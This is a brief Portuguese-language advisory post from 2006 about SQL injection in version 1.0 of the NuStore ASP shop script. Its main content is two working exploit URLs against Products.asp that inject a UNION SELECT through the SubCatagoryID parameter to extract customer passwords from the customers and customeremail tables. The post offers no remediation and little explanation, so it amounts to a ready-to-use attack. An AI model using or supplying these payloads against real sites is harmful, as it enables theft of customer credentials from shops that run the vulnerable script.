| NuStore: Injeção de Codigos SQL |
|
|
| Por Raphael Martins (Ashiyakuza) | |
| 11 de novembro de 2006 | |
|
Site do script: http://www.dynamicdataworx.com/Sales/NuStore.asp Versão Afetada: 1.0 Encontrado por ajann Email: ajannhwt [at] hotmail.com Exploração: http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0 http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0 |
| < Anterior | Próximo > |
|---|





